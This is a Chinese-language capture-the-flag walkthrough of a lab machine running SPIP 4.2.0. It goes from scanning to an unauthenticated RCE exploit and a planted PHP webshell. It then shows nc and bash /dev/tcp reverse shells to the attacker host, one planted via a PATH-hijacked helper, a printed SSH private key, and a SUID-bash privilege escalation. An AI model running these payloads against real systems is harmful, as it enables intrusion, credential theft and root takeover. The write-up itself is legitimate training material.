信息收集

服务探测

sudo arp-scan -l           
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:a0:18:b4       (Unknown)
192.168.56.116  08:00:27:47:76:41       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.870 seconds (136.90 hosts/sec). 3 responded
                                                                                                     
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 09:18 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
┌──(kali㉿kali)-[~]
└─$ nmap -sV  192.168.56.116 -p 22,80 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 09:20 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.32 seconds

发现80端口开放，二话不说直接访问看一下是什么牛马

spip是个cms内容管理系统，说白了就是类似与wordpress博客，那肯定有这个版本的漏洞，searchsploit一下，哦对版本还不知，

目录扫描

扫一下目录顺便交叉验证一下

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.116
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        9l       28w      317c http://192.168.56.116/images => http://192.168.56.116/images/
200      GET       32l      224w    17917c http://192.168.56.116/images/ads.jpg
200      GET      354l      770w     5959c http://192.168.56.116/style.css
200      GET       17l       96w     5807c http://192.168.56.116/images/templatmeo_column_two_bg.jpg
200      GET        8l       45w     3539c http://192.168.56.116/images/180_column_bg.jpg
200      GET      142l      610w    69796c http://192.168.56.116/images/image_02.jpg
200      GET       69l       74w     4051c http://192.168.56.116/images/comment_icon.jpg
200      GET      237l     1368w   110318c http://192.168.56.116/images/image_01.jpg
200      GET        9l       69w     8953c http://192.168.56.116/images/menu_bg.jpg
200      GET        7l       13w      379c http://192.168.56.116/images/menu_bg_repeat.jpg
200      GET       81l      462w    49772c http://192.168.56.116/images/bottom_panel_bg.jpg
200      GET      150l      766w     8686c http://192.168.56.116/
200      GET      109l      602w    53555c http://192.168.56.116/images/logo.jpg
200      GET      132l     1196w   102457c http://192.168.56.116/images/top_bg.jpg
301      GET        9l       28w      315c http://192.168.56.116/spip => http://192.168.56.116/spip/#从这开始扫到spip目录了
301      GET        9l       28w      319c http://192.168.56.116/spip/tmp => http://192.168.56.116/spip/tmp/
200      GET        3l       13w       83c http://192.168.56.116/spip/tmp/remove.txt

访问一下/spip，好吧好像还是没有找到版本信息，不过在响应包中composed-By中看到了，既然是4.2.0那就好办了

搜索漏洞Exploit

巧了，还正好有一个exploit

┌──(kali㉿kali)-[~]                                                                                  
└─$ searchsploit spip 4.2.0                                                                          
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path                           
------------------------------------------------------------------- ---------------------------------
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)              | php/webapps/51536.py            
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

拷贝到本地cat一下

后面没截完整，看了下说明，要进?page=login界面，用了发现提示Unable to find Anti-CSRF token

后面用burpsuite抓包看了下，有个找回密码的界面你不需要输入用户名，只需要输入邮箱即可

随便填了邮箱上去，抓到一个关键点表单操作用户名为oubli

大概率是ssh的用户名了

但怎么通过spip获取webshell是个问题

好吧，上面方向错了，实际上expolit是可以执行的

尝试植入一句话木马

构造payload就是一句话木马先base64加密再解密一下，但我不清楚为什么不能用<?php eval($_POST[a]);?>只能用```，问了下GPT可能请求方式有区别吧

┌──(kali㉿kali)-[~]
└─$ python3 51536.py -u http://192.168.56.116/spip -c 'echo "PD89YCRfR0VUWzBdYD8+" | base64 -d > webshell.php' ##这里的“PD89YCRfR0VUWzBdYD8+”解码之后就是<?=`$_GET[0]`?>
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=whoami
www-data
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al
total 168
drwxr-xr-x 11 www-data www-data  4096 Sep 10 22:42 .
drwxr-x---  5 www-data www-data  4096 Dec 20  2023 ..
-rwxr-xr-x  1 www-data www-data  7045 Dec 20  2023 CHANGELOG.md
drwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 IMG
-rwxr-xr-x  1 www-data www-data 35147 Dec 20  2023 LICENSE
-rwxr-xr-x  1 www-data www-data   842 Dec 20  2023 README.md
-rwxr-xr-x  1 www-data www-data   178 Dec 20  2023 SECURITY.md
-rwxr-xr-x  1 www-data www-data  1761 Dec 20  2023 composer.json
-rwxr-xr-x  1 www-data www-data 27346 Dec 20  2023 composer.lock
drwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 config
drwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 ecrire
-rwxr-xr-x  1 www-data www-data  4307 Dec 20  2023 htaccess.txt
-rwxr-xr-x  1 www-data www-data    42 Dec 20  2023 index.php
drwxr-xr-x  5 www-data www-data  4096 Dec 20  2023 local
drwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 plugins-dist
-rwxr-xr-x  1 www-data www-data  3645 Dec 20  2023 plugins-dist.json
drwxr-xr-x 12 www-data www-data  4096 Dec 20  2023 prive
-rwxr-xr-x  1 www-data www-data   973 Dec 20  2023 spip.php
-rwxr-xr-x  1 www-data www-data  1212 Dec 20  2023 spip.png
-rwxr-xr-x  1 www-data www-data  1673 Dec 20  2023 spip.svg
drwxr-xr-x 10 www-data www-data  4096 Dec 20  2023 squelettes-dist
-rw-rw-rw-  1 www-data www-data     2 Sep 10 22:26 test
drwxr-xr-x  6 www-data www-data  4096 Sep 11 16:39 tmp
drwxr-xr-x  6 www-data www-data  4096 Dec 20  2023 vendor
-rw-rw-rw-  1 www-data www-data    15 Sep 11 17:01 webshell.php
-rw-rw-rw-  1 www-data www-data    28 Sep 10 22:47 webshell1.php

显然可以返回命令，那尝试使用nc反弹shell，弹不过来，尝试wget一下本机上的php-reverse-shell.php，虽然请求了返回200但是靶机上还是没有，可能里面有过滤，不过好在可以用www-data这个用户读user文件夹

┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=nc+-e+/bin/bash+192.168.56.102+4444 
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al+/home/think/user.txt
-rw-r--r-- 1 root root 35 Feb 10  2024 /home/think/user.txt

好在拿到user的flag，但问题要提权先有个稳定的shell啊，一直这样也不行，后面发现可以通过ssh连上

SSH登入

┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al+/home/think         
total 48
drwxr-xr-x 8 think    think    4096 Feb 10  2024 .
drwxr-xr-x 1 root     root     4096 Dec  7  2023 ..
lrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout
-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc
drwx------ 2 think    think    4096 Nov 14  2023 .cache
drwx------ 3 think    think    4096 Dec  8  2023 .config
drwx------ 3 think    think    4096 Feb 10  2024 .gnupg
drwxrwxr-x 3 think    think    4096 Jan 10  2024 .local
-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile
lrwxrwxrwx 1 think    think       9 Feb 10  2024 .python_history -> /dev/null
drwxr-xr-x 2 think    think    4096 Jan 10  2024 .ssh###可以读ssh的私钥
lrwxrwxrwx 1 think    think       9 Feb 10  2024 .viminfo -> /dev/null
drwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip
-rw-r--r-- 1 root     root       35 Feb 10  2024 user.txt
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=cat+/home/think/.ssh/id_rsa >id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa  
┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-169-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 11 Sep 2024 05:20:22 PM UTC

  System load:                      0.0
  Usage of /:                       74.9% of 9.75GB
  Memory usage:                     30%
  Swap usage:                       0%
  Processes:                        202
  Users logged in:                  0
  IPv4 address for br-72fdb218889f: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for enp0s3:          192.168.56.116


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Mar 29 13:22:11 2024 from 192.168.109.1
think@publisher:~$

信息收集

ok登上了，先随便搜集一下

找到一个可疑suid文件

think@publisher:/tmp$ find / -perm -u=s -type f 2>/dev/null 
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container ##应该是docker方面的
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
think@publisher:/tmp$ strings /usr/sbin/run_container ##好在靶机有strings
/lib64/ld-linux-x86-64.so.2
libc.so.6
__stack_chk_fail
execve
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
GLIBC_2.4
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/bash ##可能是用bash执行下面的脚本
/opt/run_container.sh##可疑
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
run_container.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
__stack_chk_fail@@GLIBC_2.4
__libc_start_main@@GLIBC_2.2.5
execve@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
think@publisher:/tmp$ cat /opt/run_container.sh
cat: /opt/run_container.sh: Permission denied
think@publisher:/tmp$ ls -al /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Mar 29 13:25 /opt/run_container.sh
think@publisher:/tmp$ cd /opt/
think@publisher:/opt$ ls
ls: cannot open directory '.': Permission denied

find / -perm -u=s -type f 2>/dev/null
/表示从文件系统的顶部（根）开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件，而不是目录或特殊文件
2表示该进程的第二个文件描述符，即stderr（标准错误）
>表示重定向
/dev/null是一个特殊的文件系统对象，它将丢弃写入其中的所有内容。

不知道咋回事，读不了这个文件，但是权限是有的，没办法看了下其他WP，env看了下环境变量

发现think用户用的shell是ash不是bash

think@publisher:/tmp$ env
SHELL=/usr/sbin/ash ##受限的shell
PWD=/tmp
LOGNAME=think
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/think
LANG=en_US.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.56.102 38494 192.168.56.116 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=think
SHLVL=1
XDG_SESSION_ID=6
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.56.102 38494 22
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
SSH_TTY=/dev/pts/0
OLDPWD=/opt
_=/usr/bin/env

提权Root

我一直想的是既然/usr/sbin/run_container会执行/opt/run_container.sh那修改这个sh脚本文件不就行了，但是没权限哇，

虽然无法查看和修改/opt/run_container.sh，但是可以直接执行

think@publisher:/tmp$ /opt/run_container.sh
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied ##这里提示也没权限
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
List of Docker containers:
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied

Enter the ID of the container or leave blank to create a new one: 1 ##提示输入containerID或者创建一个
/opt/run_container.sh: line 16: validate_container_id: command not found ##提示在脚本的第16行有个validate_container_id命令没找到

OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:

应该是个命令劫持的点吧

think@publisher:/tmp$ echo -n "bash -i &>/dev/tcp/192.168.56.102/4444 <&1">validate_container_id
think@publisher:/tmp$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
think@publisher:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
think@publisher:~$ validate_container_id
bash: /tmp/validate_container_id: Permission denied
think@publisher:~$ chmod +x /tmp/validate_container_id 
think@publisher:~$ /opt/run_container.sh
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
List of Docker containers:
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied

Enter the ID of the container or leave blank to create a new one: 1##其实不用管containerID乱填就好，回车之后会卡住，那边就已经收到弹过来的shell了

拿到shell我以为会是root的，结果还是think不过好在是可以查看/opt目录了

看了下run_container.sh第十六行果然有validate_container_id

1:#!/bin/bash
2:
3:# Function to list Docker containers
4:list_containers() {
5:    if [ -z "$(docker ps -aq)" ]; then
6:      docker run -d --restart always -p 8000:8000 -v /home/think:/home/think 4b5aec41d6ef;
7:    fi
8:    echo "List of Docker containers:"
9:    docker ps -a --format "ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}"
10:    echo ""
11:}
12:
13:# Function to prompt user for container ID
14:prompt_container_id() {
15:    read -p "Enter the ID of the container or leave blank to create a new one: " container_id
16:    validate_container_id "$container_id"
17:}
18:
19:# Function to display options and perform actions
20:select_action() {
21:    echo ""
22:    echo "OPTIONS:"
23:    local container_id="$1"
24:    PS3="Choose an action for a container: "
25:    options=("Start Container" "Stop Container" "Restart Container" "Create Container" "Quit")
26:
27:    select opt in "${options[@]}"; do
28:        case $REPLY in
29:            1) docker start "$container_id"; break ;;
30:            2)       if [ $(docker ps -q | wc -l) -lt 2 ]; then
31:                 echo "No enough containers are currently running."
32:                 exit 1
33:             fi
34:                docker stop "$container_id"
35:                break ;;
36:            3) docker restart "$container_id"; break ;;
37:            4) echo "Creating a new container..."
38:               docker run -d --restart always -p 80:80 -v /home/think:/home/think spip-image:latest 
39:               break ;;
40:            5) echo "Exiting..."; exit ;;
41:            *) echo "Invalid option. Please choose a valid option." ;;
42:        esac
43:    done
44:}
45:
46:# Main script execution
47:list_containers
48:prompt_container_id  # Get the container ID from prompt_container_id function
49:select_action "$container_id"  # Pass the container ID to select_action function

既然可以直接修改run_container.sh，那后续就简单多了

直接把bin/bash 加个suid

#!/bin/bash
chmod +s /bin/bash##将这两行写入run_container.sh
-rwxr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash
think@publisher:~$ /usr/sbin/run_container ##这个会调用上面的sh脚本
think@publisher:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash ##这时bash有了suid

think@publisher:~$ /bin/bash -p
bash-5.0# id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
root.txt  spip
bash-5.0# cat root.txt
3a4225cc9e85709adda6ef55d6a4f2ca

ok啊，拿下了，但是做了快两天了，人都麻了